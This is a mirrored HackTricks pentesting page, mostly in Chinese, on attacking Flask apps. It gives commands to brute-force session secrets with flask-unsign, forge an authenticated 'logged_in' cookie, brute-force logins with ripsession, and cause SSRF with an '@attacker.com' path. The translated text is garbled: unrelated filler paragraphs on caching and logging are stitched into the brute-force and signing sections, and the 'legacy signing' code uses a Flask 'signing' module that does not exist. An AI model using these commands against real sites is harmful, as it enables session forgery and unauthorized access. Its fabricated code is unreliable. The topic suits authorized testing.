mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-30 16:39:32 +00:00
236 lines
14 KiB
Markdown
236 lines
14 KiB
Markdown
# Flask
|
||
|
||
<details>
|
||
|
||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
||
* 你在一个**网络安全公司**工作吗?你想在HackTricks中看到你的**公司广告**吗?或者你想获得**PEASS的最新版本或下载PDF格式的HackTricks**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||
* 发现我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
||
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
|
||
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)或**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
|
||
* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和**[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。**
|
||
|
||
</details>
|
||
|
||
<figure><img src="../../.gitbook/assets/image (9) (1) (2).png" alt=""><figcaption></figcaption></figure>
|
||
|
||
使用[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks)可以轻松构建和**自动化工作流程**,使用世界上最先进的社区工具。\
|
||
立即获取访问权限:
|
||
|
||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||
|
||
**如果你在玩CTF,Flask应用程序可能与**[**SSTI**](../../pentesting-web/ssti-server-side-template-injection/)**相关。**
|
||
|
||
## Cookies
|
||
|
||
默认的cookie会话名称是**`session`**。
|
||
|
||
### 解码器
|
||
|
||
在线Flask cookie解码器:[https://www.kirsle.net/wizards/flask-session.cgi](https://www.kirsle.net/wizards/flask-session.cgi)
|
||
|
||
#### 手动解码
|
||
|
||
获取cookie的第一部分,直到第一个点,并对其进行Base64解码>
|
||
```bash
|
||
echo "ImhlbGxvIg" | base64 -d
|
||
```
|
||
cookie也使用密码进行签名
|
||
|
||
### **Flask-Unsign**
|
||
|
||
命令行工具,通过猜测秘钥来获取、解码、暴力破解和构造Flask应用程序的会话cookie。
|
||
|
||
{% embed url="https://pypi.org/project/flask-unsign/" %}
|
||
```bash
|
||
pip3 install flask-unsign
|
||
```
|
||
#### **解码 Cookie**
|
||
|
||
To decode a cookie, you can use various tools and techniques. One common method is to use a base64 decoder to decode the cookie value. Base64 encoding is commonly used to encode binary data into ASCII characters, and decoding it reverses the process.
|
||
|
||
Here is an example of how you can decode a cookie using Python and the Flask framework:
|
||
|
||
```python
|
||
import base64
|
||
|
||
from flask import Flask, request
|
||
|
||
app = Flask(__name__)
|
||
|
||
@app.route('/')
|
||
def index():
|
||
cookie_value = request.cookies.get('cookie_name')
|
||
decoded_value = base64.b64decode(cookie_value).decode('utf-8')
|
||
return f'Decoded cookie value: {decoded_value}'
|
||
|
||
if __name__ == '__main__':
|
||
app.run()
|
||
```
|
||
|
||
In this example, we import the `base64` module and the `Flask` class from the Flask framework. We define a route for the root URL ("/") and retrieve the value of the cookie named "cookie_name" using `request.cookies.get()`. We then decode the cookie value using `base64.b64decode()` and convert it to a UTF-8 string using `.decode('utf-8')`. Finally, we return the decoded cookie value as the response.
|
||
|
||
Keep in mind that decoding a cookie may not always reveal sensitive information. It depends on how the cookie is encoded and what data it contains. Always exercise caution and ensure you have proper authorization before attempting to decode or manipulate cookies.
|
||
```bash
|
||
flask-unsign --decode --cookie 'eyJsb2dnZWRfaW4iOmZhbHNlfQ.XDuWxQ.E2Pyb6x3w-NODuflHoGnZOEpbH8'
|
||
```
|
||
#### **暴力破解**
|
||
|
||
Brute force(暴力破解)是一种常见的网络攻击技术,用于尝试所有可能的密码组合来获取未经授权的访问权限。在Web应用程序中,暴力破解通常用于尝试破解用户账户的密码。
|
||
|
||
暴力破解攻击可以通过多种方式进行,包括使用字典文件、使用常见密码列表或使用自动生成的密码组合。攻击者可以使用自动化工具来加快暴力破解的速度,并尝试大量的密码组合。
|
||
|
||
为了防止暴力破解攻击,Web应用程序可以采取一些安全措施,例如实施密码策略(如强制使用复杂密码、限制登录尝试次数)、使用多因素身份验证、实施帐户锁定机制等。
|
||
|
||
作为渗透测试人员,我们可以使用暴力破解技术来测试Web应用程序的密码安全性,并向开发人员提供改进建议,以确保用户账户的安全性。
|
||
```bash
|
||
flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie '<cookie>' --no-literal-eval
|
||
```
|
||
#### **签名**
|
||
|
||
Signing is a process used to verify the authenticity and integrity of data. In the context of web applications, signing is often used to ensure that data sent between the client and the server has not been tampered with.
|
||
|
||
签名是一种用于验证数据的真实性和完整性的过程。在Web应用程序的上下文中,签名通常用于确保在客户端和服务器之间发送的数据没有被篡改。
|
||
|
||
#### **Session Management**
|
||
|
||
会话管理
|
||
|
||
Session management is an important aspect of web application security. It involves the management and control of user sessions, which are used to maintain state and track user interactions on a website.
|
||
|
||
会话管理是Web应用程序安全的重要方面。它涉及管理和控制用户会话,用于维护状态并跟踪用户在网站上的交互。
|
||
|
||
#### **Input Validation**
|
||
|
||
输入验证
|
||
|
||
Input validation is the process of ensuring that user input is valid and safe before it is processed by a web application. This is crucial for preventing various types of attacks, such as SQL injection and cross-site scripting (XSS).
|
||
|
||
输入验证是确保用户输入在被Web应用程序处理之前是有效和安全的过程。这对于防止各种类型的攻击非常重要,例如SQL注入和跨站脚本(XSS)。
|
||
|
||
#### **Error Handling**
|
||
|
||
错误处理
|
||
|
||
Error handling is the process of managing and responding to errors that occur during the execution of a web application. Proper error handling is important for maintaining the security and stability of a web application.
|
||
|
||
错误处理是在Web应用程序执行过程中管理和响应错误的过程。适当的错误处理对于维护Web应用程序的安全性和稳定性非常重要。
|
||
|
||
#### **Access Control**
|
||
|
||
访问控制
|
||
|
||
Access control is the process of determining what actions a user is allowed to perform within a web application. It involves defining and enforcing rules and restrictions to ensure that only authorized users can access certain resources or perform certain actions.
|
||
|
||
访问控制是确定用户在Web应用程序中允许执行哪些操作的过程。它涉及定义和执行规则和限制,以确保只有授权用户可以访问某些资源或执行某些操作。
|
||
|
||
#### **Caching**
|
||
|
||
缓存
|
||
|
||
Caching is a technique used to store and retrieve frequently accessed data in order to improve the performance of a web application. It involves storing copies of data in a cache, which can be quickly accessed instead of retrieving the data from its original source.
|
||
|
||
缓存是一种用于存储和检索频繁访问的数据以提高Web应用程序性能的技术。它涉及将数据的副本存储在缓存中,可以快速访问而不是从其原始来源检索数据。
|
||
|
||
#### **Logging and Monitoring**
|
||
|
||
日志记录和监控
|
||
|
||
Logging and monitoring are important for detecting and responding to security incidents in a web application. Logging involves recording events and activities that occur within the application, while monitoring involves actively observing and analyzing the application's behavior to identify any suspicious or malicious activity.
|
||
|
||
日志记录和监控对于检测和响应Web应用程序中的安全事件非常重要。日志记录涉及记录应用程序内发生的事件和活动,而监控则涉及主动观察和分析应用程序的行为,以识别任何可疑或恶意活动。
|
||
```bash
|
||
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'
|
||
```
|
||
#### 使用传统方式进行签名(旧版本)
|
||
|
||
In older versions of Flask, the `signing` module was used to sign cookies and other data. This module provided a way to ensure the integrity and authenticity of the data being transmitted.
|
||
|
||
在旧版本的Flask中,使用`signing`模块对cookie和其他数据进行签名。该模块提供了一种确保传输数据的完整性和真实性的方式。
|
||
|
||
To sign data using the legacy method, you can import the `signing` module and use the `sign` function. This function takes the data to be signed and a secret key as parameters.
|
||
|
||
要使用传统方法对数据进行签名,可以导入`signing`模块并使用`sign`函数。该函数接受要签名的数据和一个密钥作为参数。
|
||
|
||
```python
|
||
from flask import signing
|
||
|
||
data = "Hello, world!"
|
||
secret_key = "my_secret_key"
|
||
|
||
signed_data = signing.sign(data, secret_key)
|
||
```
|
||
|
||
The `sign` function returns a signed string that can be transmitted along with the data. To verify the signature, you can use the `unsign` function.
|
||
|
||
`sign`函数返回一个已签名的字符串,可以与数据一起传输。要验证签名,可以使用`unsign`函数。
|
||
|
||
```python
|
||
verified_data = signing.unsign(signed_data, secret_key)
|
||
```
|
||
|
||
The `unsign` function will raise a `BadSignature` exception if the signature is invalid or if the data has been tampered with.
|
||
|
||
如果签名无效或数据被篡改,`unsign`函数将引发`BadSignature`异常。
|
||
|
||
It is important to note that the legacy signing method is not as secure as the current method provided by Flask. It is recommended to upgrade to the latest version of Flask and use the new signing method for improved security.
|
||
|
||
需要注意的是,传统的签名方法不如Flask提供的当前方法安全。建议升级到最新版本的Flask,并使用新的签名方法以提高安全性。
|
||
```bash
|
||
flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy
|
||
```
|
||
### **RIPsession**
|
||
|
||
命令行工具,使用使用flask-unsign生成的cookie对网站进行暴力破解。
|
||
|
||
{% embed url="https://github.com/Tagvi/ripsession" %}
|
||
```bash
|
||
ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s password123 -f "user doesn't exist" -w wordlist.txt
|
||
```
|
||
### 使用SQLmap在Flask会话cookie中进行SQL注入
|
||
|
||
[**这个例子**](../../pentesting-web/sql-injection/sqlmap/#eval) 使用sqlmap的`eval`选项来使用已知的密钥自动签名flask的payload。
|
||
|
||
## Flask代理到SSRF
|
||
|
||
[**在这篇文章中**](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies) 解释了Flask如何允许以字符“@”开头的请求。
|
||
```http
|
||
GET @/ HTTP/1.1
|
||
Host: target.com
|
||
Connection: close
|
||
```
|
||
在以下情况中:
|
||
```python
|
||
from flask import Flask
|
||
from requests import get
|
||
|
||
app = Flask('__main__')
|
||
SITE_NAME = 'https://google.com/'
|
||
|
||
@app.route('/', defaults={'path': ''})
|
||
@app.route('/<path:path>')
|
||
def proxy(path):
|
||
return get(f'{SITE_NAME}{path}').content
|
||
|
||
app.run(host='0.0.0.0', port=8080)
|
||
```
|
||
可以允许输入类似 "@attacker.com" 的内容,以引发 SSRF 攻击。
|
||
|
||
<figure><img src="../../.gitbook/assets/image (9) (1) (2).png" alt=""><figcaption></figcaption></figure>
|
||
|
||
使用 [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) 可以轻松构建和自动化由全球最先进的社区工具提供支持的工作流程。\
|
||
立即获取访问权限:
|
||
|
||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||
|
||
<details>
|
||
|
||
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks 云 ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||
|
||
* 你在一家 **网络安全公司** 工作吗?想要在 HackTricks 中宣传你的公司吗?或者想要获取最新版本的 PEASS 或下载 HackTricks 的 PDF 吗?请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||
* 发现我们的独家 [**NFTs**](https://opensea.io/collection/the-peass-family) 集合 - [**The PEASS Family**](https://opensea.io/collection/the-peass-family)
|
||
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
|
||
* **加入** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass),或在 **Twitter** 上 **关注** 我 [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
|
||
* **通过向** [**hacktricks 仓库**](https://github.com/carlospolop/hacktricks) **和** [**hacktricks-cloud 仓库**](https://github.com/carlospolop/hacktricks-cloud) **提交 PR 来分享你的黑客技巧。**
|
||
|
||
</details>
|